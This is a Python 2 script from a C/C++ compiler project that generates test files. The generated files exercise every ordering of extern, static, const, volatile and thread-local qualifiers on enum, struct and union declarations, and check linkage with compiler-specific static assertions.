7ca97ec0af14d092c87a25e07d7ed486c7912266
|
[
"BSL-1.0"
] | 4
|
2019-12-07T08:08:29.000Z
|
2021-01-22T00:19:10.000Z
|
tools/decl_infile.py
|
zaimoni/Z.C-
|
7ca97ec0af14d092c87a25e07d7ed486c7912266
|
[
"BSL-1.0"
] | null | null | null |
#!/usr/bin/python
# an auxilliary script for generating the test files
# verified for Python 2.5, 2.6, 2.7
# fails: Python 3.0, 3.1, 3.2 (xrange not supported)
# (C)2011 Kenneth Boyd, license: MIT.txt
# target files
target_files = ['Pass_enum_def.in', 'Pass_struct_def.in', 'Pass_union_def.in']
target_files2 = ['Pass_enum_def_decl.in', 'Pass_struct_def_decl.in', 'Pass_union_def_decl.in']
target_files3 = ['Pass_enum_def2.hpp', 'Pass_struct_def2.hpp', 'Pass_union_def2.hpp']
invariant_header_lines = [
'SUFFIXES h hpp\n',
'OBJECTLIKE_MACRO THREAD_LOCAL _Thread_local thread_local\n',
'OBJECTLIKE_MACRO STATIC_ASSERT _Static_assert static_assert\n',
'OBJECTLIKE_MACRO TYPE_LINKAGE_CODE 0 2\n',
'OBJECTLIKE_MACRO DEFAULT_CONST_LINKAGE_CODE 2 1\n',
'// (C)2009,2011 Kenneth Boyd, license: MIT.txt\n'
]
context = { 'Pass_enum_def.in':'// using singly defined enum\n',
'Pass_struct_def.in':'// using singly defined struct\n',
'Pass_union_def.in':'// using singly defined union\n',
'Pass_enum_def_decl.in':'// using singly defined enum\n',
'Pass_struct_def_decl.in':'// using singly defined struct\n',
'Pass_union_def_decl.in':'// using singly defined union\n',
'Pass_enum_def2.hpp':'// using singly defined enum\n',
'Pass_struct_def2.hpp':'// using singly defined struct\n',
'Pass_union_def2.hpp':'// using singly defined union\n'}
global_define = { 'Pass_enum_def.in':'\nenum good_test {\n\tx_factor = 1\n};\n\n',
'Pass_struct_def.in':'\nstruct good_test {\n\tint x_factor\n};\n\n',
'Pass_union_def.in':'\nunion good_test {\n\tint x_factor\n};\n\n',
'Pass_enum_def_decl.in':'\nenum good_test {\n\tx_factor = 1\n} y;\n\n',
'Pass_struct_def_decl.in':'\nstruct good_test {\n\tint x_factor\n} y;\n\n',
'Pass_union_def_decl.in':'\nunion good_test {\n\tint x_factor\n};\n\n',
'Pass_enum_def2.hpp':'\nenum good_test {\n\tx_factor = 1\n};\n\n',
'Pass_struct_def2.hpp':'\nstruct good_test {\n\tint x_factor\n};\n\n',
'Pass_union_def2.hpp':'\nunion good_test {\n\tint x_factor\n};\n\n'}
section_comments = ['// ringing the changes on extern\n',
"// ringing the changes on static\n",
'// extern/static not in first position is deprecated, but legal\n',
'// ringing the changes on THREAD_LOCAL extern\n',
'// ringing the changes on THREAD_LOCAL static\n',
'// THREAD_LOCAL extern not in first two positions is deprecated, but legal\n',
'// THREAD_LOCAL static not in first two positions is deprecated, but legal\n']
def enum_decl(i):
return "enum good_test x"+i
def struct_decl(i):
return "struct good_test x"+i
def union_decl(i):
return "union good_test x"+i
def enum_decl_terse(i):
return "good_test x"+i
def struct_decl_terse(i):
return "good_test x"+i
def union_decl_terse(i):
return "good_test x"+i
var_decl = {'Pass_enum_def.in':enum_decl, 'Pass_struct_def.in':struct_decl,
'Pass_union_def.in':union_decl, 'Pass_enum_def_decl.in':enum_decl,
'Pass_struct_def_decl.in':struct_decl, 'Pass_union_def_decl.in':union_decl,
'Pass_enum_def2.hpp':enum_decl, 'Pass_struct_def2.hpp':struct_decl,
'Pass_union_def2.hpp':union_decl}
var_decl_terse = { 'Pass_enum_def2.hpp':enum_decl_terse, 'Pass_struct_def2.hpp':struct_decl_terse,
'Pass_union_def2.hpp':union_decl_terse}
def enum_def(i):
return 'enum good_test'+i+' { x_factor'+i+' = 1 } x_'+i
def struct_def(i):
return 'struct good_test'+i+' { int x_factor'+i+'; } x_'+i
def union_def(i):
return 'union good_test'+i+' { int x_factor'+i+'; } x_'+i
var_def = { 'Pass_enum_def.in':enum_def, 'Pass_struct_def.in':struct_def,
'Pass_union_def.in':union_def, 'Pass_enum_def2.hpp':enum_def,
'Pass_struct_def2.hpp':struct_def, 'Pass_union_def2.hpp':union_def}
#so...generally (decl family)
#* linkage of struct/union/enum good_test... is none in C, namespace-default in C++ (in practice C++ extern)
#* linkage of variables is static:internal or extern:C/C++ external
#** that is: 1 or 2
#** default linkage: extern in general, const is extern/C static/C++ (2/C 1/C++)
# in general, static const non-volatile variations should warn (the optimizer will go wild)
# on the other hand, C99 6.7.8p10/C1X 6.7.9p10 gives full default initialization (as zero-initialization) so C is fine
# C++0X 8.5p9: static storage duration is zero-initialized so C++ is fine as well
test_qualifiers = [
'extern',
'extern const',
'extern volatile',
'extern const volatile',
'extern volatile const',
'static',
'static const',
'static volatile',
'static const volatile',
'static volatile const',
'const extern',
'volatile extern',
'const extern volatile',
'const volatile extern',
'volatile extern const',
'volatile const extern',
'const static',
'volatile static',
'const static volatile',
'const volatile static',
'volatile static const',
'volatile const static',
'extern THREAD_LOCAL',
'extern THREAD_LOCAL const',
'extern THREAD_LOCAL volatile',
'extern THREAD_LOCAL const volatile',
'extern THREAD_LOCAL volatile const',
'THREAD_LOCAL extern',
'THREAD_LOCAL extern const',
'THREAD_LOCAL extern volatile',
'THREAD_LOCAL extern const volatile',
'THREAD_LOCAL extern volatile const',
'static THREAD_LOCAL',
'static THREAD_LOCAL const',
'static THREAD_LOCAL volatile',
'static THREAD_LOCAL const volatile',
'static THREAD_LOCAL volatile const',
'THREAD_LOCAL static',
'THREAD_LOCAL static const',
'THREAD_LOCAL static volatile',
'THREAD_LOCAL static const volatile',
'THREAD_LOCAL static volatile const',
'extern const THREAD_LOCAL',
'const extern THREAD_LOCAL',
'extern volatile THREAD_LOCAL',
'volatile extern THREAD_LOCAL',
'extern const THREAD_LOCAL volatile',
'extern const volatile THREAD_LOCAL',
'const extern THREAD_LOCAL volatile',
'const extern volatile THREAD_LOCAL',
'const volatile extern THREAD_LOCAL',
'extern volatile THREAD_LOCAL const',
'extern volatile const THREAD_LOCAL',
'volatile extern THREAD_LOCAL const',
'volatile extern const THREAD_LOCAL',
'volatile const extern THREAD_LOCAL',
'THREAD_LOCAL const extern',
'const THREAD_LOCAL extern',
'THREAD_LOCAL volatile extern',
'volatile THREAD_LOCAL extern',
'THREAD_LOCAL const extern volatile',
'THREAD_LOCAL const volatile extern',
'const THREAD_LOCAL extern volatile',
'const THREAD_LOCAL volatile extern',
'const volatile THREAD_LOCAL extern',
'THREAD_LOCAL volatile extern const',
'THREAD_LOCAL volatile const extern',
'volatile THREAD_LOCAL extern const',
'volatile THREAD_LOCAL const extern',
'volatile const THREAD_LOCAL extern',
'static const THREAD_LOCAL',
'const static THREAD_LOCAL',
'static volatile THREAD_LOCAL',
'volatile static THREAD_LOCAL',
'static const THREAD_LOCAL volatile',
'static const volatile THREAD_LOCAL',
'const static THREAD_LOCAL volatile',
'const static volatile THREAD_LOCAL',
'const volatile static THREAD_LOCAL',
'static volatile THREAD_LOCAL const',
'static volatile const THREAD_LOCAL',
'volatile static THREAD_LOCAL const',
'volatile static const THREAD_LOCAL',
'volatile const static THREAD_LOCAL',
'THREAD_LOCAL const static',
'const THREAD_LOCAL static',
'THREAD_LOCAL volatile static',
'volatile THREAD_LOCAL static',
'THREAD_LOCAL const static volatile',
'THREAD_LOCAL const volatile static',
'const THREAD_LOCAL static volatile',
'const THREAD_LOCAL volatile static',
'const volatile THREAD_LOCAL static',
'THREAD_LOCAL volatile static const',
'THREAD_LOCAL volatile const static',
'volatile THREAD_LOCAL static const',
'volatile THREAD_LOCAL const static',
'volatile const THREAD_LOCAL static'
]
def SpawnTestCase(dest_file):
TargetFile = open(dest_file,'w')
for line in invariant_header_lines:
TargetFile.write(line)
TargetFile.write(context[dest_file])
TargetFile.write(global_define[dest_file])
TargetFile.write(section_comments[0])
for i in xrange(5):
TargetFile.write(test_qualifiers[i]+' '+var_decl[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1])
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5]+' '+var_decl[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2])
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10]+' '+var_decl[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22]+' '+var_decl[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32]+' '+var_decl[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42]+' '+var_decl[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70]+' '+var_decl[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
TargetFile.write('// define-declares\n')
TargetFile.write(section_comments[0])
for i in xrange(5):
TargetFile.write(test_qualifiers[i]+' '+var_def[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1])
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5]+' '+var_def[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2])
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10]+' '+var_def[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22]+' '+var_def[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32]+' '+var_def[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42]+' '+var_def[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70]+' '+var_def[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
# check ZCC compiler extensions
TargetFile.write('\n// check ZCC compiler extensions\n')
TargetFile.write('#if 9<=10000*__ZCC__+100*__ZCC_MINOR__+__ZCC_PATCHLEVEL__\n')
TargetFile.write('// the type names should have no linkage in C, external linkage in C++\n')
TargetFile.write('STATIC_ASSERT(TYPE_LINKAGE_CODE==__zcc_linkage(good_test),"good_test has incorrect linkage");\n')
for i in xrange(5+5+12+10+10+28+18):
TargetFile.write('STATIC_ASSERT(TYPE_LINKAGE_CODE==__zcc_linkage(good_test'+str(i+1)+'),"good_test'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('\n// check external linkage of variables\n')
for i in xrange(5):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x_'+str(i+1)+'),"x_'+str(i+1)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x_'+str(i+11)+'),"x_'+str(i+11)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x_'+str(i+23)+'),"x_'+str(i+23)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x_'+str(i+43)+'),"x_'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('\n// check internal linkage of variables\n')
for i in xrange(5):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x_'+str(i+6)+'),"x_'+str(i+6)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x_'+str(i+17)+'),"x_'+str(i+17)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x_'+str(i+33)+'),"x_'+str(i+33)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x_'+str(i+71)+'),"x_'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('#endif\n')
TargetFile.close()
def SpawnTestCase2(dest_file):
# first part copied from SpawnTestCase
TargetFile = open(dest_file,'w')
for line in invariant_header_lines:
TargetFile.write(line)
TargetFile.write(context[dest_file])
TargetFile.write(global_define[dest_file])
TargetFile.write(section_comments[0])
for i in xrange(5):
TargetFile.write(test_qualifiers[i]+' '+var_decl[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1])
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5]+' '+var_decl[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2])
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10]+' '+var_decl[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22]+' '+var_decl[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4])
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32]+' '+var_decl[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42]+' '+var_decl[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6])
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70]+' '+var_decl[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
# check ZCC compiler extensions
TargetFile.write('\n// check ZCC compiler extensions\n')
TargetFile.write('#if 9<=10000*__ZCC__+100*__ZCC_MINOR__+__ZCC_PATCHLEVEL__\n')
TargetFile.write('// the type names should have no linkage in C, external linkage in C++\n')
TargetFile.write('STATIC_ASSERT(TYPE_LINKAGE_CODE==__zcc_linkage(good_test),"good_test has incorrect linkage");\n')
TargetFile.write('\n// check external linkage of variables\n')
for i in xrange(5):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('STATIC_ASSERT(2==__zcc_linkage(x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('\n// check internal linkage of variables\n')
for i in xrange(5):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+17)+'),"x'+str(i+17)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+33)+'),"x'+str(i+33)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('STATIC_ASSERT(1==__zcc_linkage(x'+str(i+71)+'),"x'+str(i+71)+' has incorrect linkage");\n')
TargetFile.write('#endif\n')
# no define-declares
TargetFile.close()
def SpawnTestCase3(dest_file):
TargetFile = open(dest_file,'w')
TargetFile.write('// decl.C99/'+dest_file+'\n')
for line in invariant_header_lines[5:]:
TargetFile.write(line)
TargetFile.write(context[dest_file])
TargetFile.write(global_define[dest_file])
# restart
TargetFile.write('// this section checks that suppressing keyword works\n')
TargetFile.write(section_comments[0].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2].replace('THREAD_LOCAL','thread_local'))
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
# need: normal decl, def_decl work in namespaces
TargetFile.write('// check that things work properly in namespaces\nnamespace test {\n')
TargetFile.write(global_define[dest_file])
TargetFile.write(section_comments[0].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2].replace('THREAD_LOCAL','thread_local'))
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70].replace('THREAD_LOCAL','thread_local')+' '+var_decl[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
TargetFile.write('// define-declares\n')
TargetFile.write(section_comments[0].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2].replace('THREAD_LOCAL','thread_local'))
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70].replace('THREAD_LOCAL','thread_local')+' '+var_def[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
# need: keyword suppression works in namespaces
TargetFile.write('} // end namespace test\n\n// check that keyword suppression works in namespaces\nnamespace test2 {\n')
TargetFile.write(global_define[dest_file])
TargetFile.write(section_comments[0].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+1))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[1].replace('THREAD_LOCAL','thread_local'))
for i in xrange(5):
TargetFile.write(test_qualifiers[i+5].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+6))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[2].replace('THREAD_LOCAL','thread_local'))
for i in xrange(12):
TargetFile.write(test_qualifiers[i+10].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+11))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[3].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+22].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+23))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[4].replace('THREAD_LOCAL','thread_local'))
for i in xrange(10):
TargetFile.write(test_qualifiers[i+32].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+33))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[5].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+42].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+43))+';\n')
TargetFile.write('\n')
TargetFile.write(section_comments[6].replace('THREAD_LOCAL','thread_local'))
for i in xrange(28):
TargetFile.write(test_qualifiers[i+70].replace('THREAD_LOCAL','thread_local')+' '+var_decl_terse[dest_file](str(i+71))+';\n')
TargetFile.write('\n')
TargetFile.write('} // end namespace test2\n')
# this is only called for C++ test cases
# check ZCC compiler extensions
TargetFile.write('\n// check ZCC compiler extensions\n')
TargetFile.write('#if 9<=10000*__ZCC__+100*__ZCC_MINOR__+__ZCC_PATCHLEVEL__\n')
TargetFile.write('// the type names should have external linkage in C++\n')
TargetFile.write('static_assert(2==__zcc_linkage(good_test),"good_test has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::good_test),"good_test has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::good_test),"good_test has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::good_test),"good_test has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test2::good_test),"good_test has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test2::good_test),"good_test has incorrect linkage");\n')
for i in xrange(5+5+12+10+10+28+18):
TargetFile.write('static_assert(2==__zcc_linkage(test::good_test'+str(i+1)+'),"good_test'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::good_test'+str(i+1)+'),"good_test'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('\n// check external linkage of variables\n')
for i in xrange(5):
TargetFile.write('static_assert(2==__zcc_linkage(x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x_'+str(i+1)+'),"x_'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x_'+str(i+1)+'),"x_'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test2::x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test2::x'+str(i+1)+'),"x'+str(i+1)+' has incorrect linkage");\n')
for i in xrange(6):
TargetFile.write('static_assert(2==__zcc_linkage(x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x_'+str(i+11)+'),"x_'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x_'+str(i+11)+'),"x_'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test2::x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test2::x'+str(i+11)+'),"x'+str(i+11)+' has incorrect linkage");\n')
for i in xrange(10):
TargetFile.write('static_assert(2==__zcc_linkage(x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x_'+str(i+23)+'),"x_'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x_'+str(i+23)+'),"x_'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test2::x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test2::x'+str(i+23)+'),"x'+str(i+23)+' has incorrect linkage");\n')
for i in xrange(28):
TargetFile.write('static_assert(2==__zcc_linkage(x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test::x_'+str(i+43)+'),"x_'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test::x_'+str(i+43)+'),"x_'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(test2::x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('static_assert(2==__zcc_linkage(::test2::x'+str(i+43)+'),"x'+str(i+43)+' has incorrect linkage");\n')
TargetFile.write('\n// check internal linkage of variables\n')
for i in xrange(5):
TargetFile.write('static_assert(1==__zcc_linkage(x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(::x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
TargetFile.write('static_assert(1==__zcc_linkage(test::x'+str(i+6)+'),"x'+str(i+6)+' has incorrect linkage");\n')
